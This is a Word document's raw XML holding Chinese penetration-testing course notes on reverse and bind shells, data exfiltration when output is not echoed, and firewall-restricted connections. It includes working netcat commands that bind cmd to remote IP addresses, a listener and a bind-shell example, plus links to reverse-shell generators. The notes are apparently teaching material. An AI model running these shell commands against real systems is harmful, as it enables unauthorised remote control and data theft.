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1BE1" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础入门-反弹Shell&amp;渗透命令&amp;Reverse反向&amp;Bind正向&amp;利用语言&amp;文件下载&amp;多姿势</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F6EBE" w14:textId="4369B1C8" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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2CAD4CE" wp14:editId="60D76C7C">
            <wp:extent cx="5274310" cy="1047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26FF" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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解析上的技术要点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搭建架构上的技术要点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源码类别上的技术要点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防护产品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保护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节点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文件托管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-OSS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通讯服务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反向代理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运维安全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负载均衡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蜜罐系统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堡垒机运维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第三方拓展架构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开发架构安全问题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、基础入门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开发架构安全问题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-http/s-Burp&amp;Yakit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-http/s-Burp&amp;Yakit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-http/s-Burp&amp;Yakit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-http/s-Burp&amp;Yakit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软件联动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-http/s-Proxifier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通用方案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-http/s-ReqableApi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其他工具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-http/s-Fiddler&amp;Charles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双层代理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扶墙环境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-HTTP/S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上游下游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项目联动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、抓包技术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-WireShark&amp;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科来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、数据不回显原因和解决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带外延迟反弹写文件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、数据不出网原因和解决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出入站策略正反向连接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-----------------------------------------------------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语言等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、系统渗透命令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架构，小程序架构，前后端分离，容器技术，云产品服务，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数据加解密算法，数据包抓取，数据包解析，正反向网络通讯，内外网通讯，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防火墙出入站，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Windows&amp;Linux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渗透命令，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产品，负载均衡，加壳保护等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WEB,APP,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前后端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容器化等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云数据库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负载均衡等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网络：不回显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反向代理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防火墙出入站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内外网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正反向连接等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MD5,Base64,AES,DES,Salt,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自定义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代码加密算法等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Windows&amp;Linux,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网络查看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反弹权限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蜜罐系统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权限设置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加壳加密反调试等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBCD269" w14:textId="5EEC97E5" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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A52A96A" wp14:editId="6DE0AA27">
            <wp:extent cx="5274310" cy="3141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0F4D1" w14:textId="1E27D427" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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503A4BC1" wp14:editId="61AF539F">
            <wp:extent cx="5274310" cy="3161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B444" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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3C3C7357" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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反弹Shell-自带命令&amp;语言代码&amp;三方项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762193E3" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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渗透命令-文件下载&amp;网络通讯&amp;配置查看等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01337004" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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数据不回显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原因解决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带外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原因：代码层面函数调用问题，没有输出测试等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、判断是不是数据不回显并且有漏洞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、有这个漏洞如何把执行的数据到呢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解决：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、反弹权限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判定目标的操作系统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https://forum.ywhack.com/shell.php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https://cloud.tencent.com/developer/article/1906240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nc -e cmd 119.45.254.149 7777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nc -lvp 7777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、数据带外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DNSlog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TCP-Portlog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ICMP-Sizelog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、延迟判断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发包看回显时间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ping -n 3 127.0.0.1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Linux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ping -c 3 127.0.0.1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、写访问文件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写静态文件或写入可访问的文件确定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、其他：根据环境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文件下载等（反链的意义）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数据不出网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原因解决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正反连接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出入站策略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隧道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环境：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外网靶机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Linux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外网攻击机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拓展思考：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内网靶机或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Linux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内网攻击机呢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、判断出入限制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、判断出入限制的端口和协议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、分析原因用正向还是反向还是隧道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原因：主机或应用防火墙出站限制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解决：利用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反弹实验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、正向连接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、反向连接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、隧道技术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实验：相对于靶机角度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、开启入站策略，采用反向连接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反向连接：主动给出去，对方监听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绑定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CMD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到目标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6666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nc -e cmd 146.56.193.187 6666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6666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连接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nc -lvvp 6666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、开启出站策略，采用正向连接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正向连接：本地监听等待对方连接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绑定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CMD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到本地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6666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nc -e cmd -lvvp 6666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主动连接目标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6666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nc 43.134.218.194 6666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、开启出站策略，采用其他协议隧道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ICMP,DNS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等隧道技术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由上述内容发现还需那些内容学习：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、其他反弹项目使用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工具或自带命令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、系统操作命令使用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、复杂内网通讯隧道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D095E" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/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的前提条件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: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已知存在的漏洞利用或执行命令的地方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为什么要反弹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Shell?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往往由于很多因素如：防火墙的开启限制，端口被占用，无法进行正向连接，数据不回显，攻击者可能无法直接从受攻击系统上建立连接并获取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控制权时。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例子：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 xml:space="preserve">1.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远程控制：通过反弹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，攻击者可以远程控制目标系统，执行各种命令和操作，获得对目标系统的完全控制权限。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2.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隐藏攻击痕迹：通过反弹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，攻击者可以在目标系统上执行命令，而不需要直接与。这样可以减少被发现的风险，同时也可以更好地隐藏攻击者的身份和攻击行为。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3.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横向渗透：一旦攻击者成功反弹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并获得目标系统的访问权限，他们可以进一步横向渗透，即在网络中移动并攻击其他系统，以获取更多的敏感信息或控制权。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4.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数据盗取和系统破坏：通过反弹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，攻击者可以获取目标系统上的敏感数据，并且可以操纵系统以造成损害，例如删除文件、破坏系统配置等。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在线生成：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https://sec.lintstar.top/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https://www.revshells.com/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https://forum.ywhack.com/shell.php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命令类别：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、开发语言：系统环境变量开发环境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、系统自带：系统支持的系统命令调用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、第三方项目：利用远程下载命令后调用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、正反向类别：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Reverse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Bind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绑定等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实验环境：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Windows&lt;--&gt;Linux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总结：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Windows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上基本就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PowerShell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命令可以反弹，再就是环境变量的开发语言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Linux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上默认自带的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nc(ncat)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，系统命令，开发语言等基本大部分都可反弹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渗透命令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在线参考：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https://book.shentoushi.top/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https://forum.ywhack.com/bountytips.php?download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D32AA" w14:textId="77777777" w:rsidR="007F6AC9" w:rsidRDefault="007F6AC9" w:rsidP="007F6AC9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8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49D970DF" w14:textId="77777777" w:rsidR="00420A6C" w:rsidRPr="007F6AC9" w:rsidRDefault="00420A6C"/>
    <w:sectPr w:rsidR="00420A6C" w:rsidRPr="007F6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7EAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE5A18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AC"/>
    <w:rsid w:val="00420A6C"/>
    <w:rsid w:val="007F6AC9"/>
    <w:rsid w:val="00CB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0DF40-F27D-4503-B239-0AF3F57B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7F6AC9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F6A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6AC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F6AC9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F6A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doc/DQ3Z6RkNpaUtMcE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2024-12-01T10:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-01T10:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>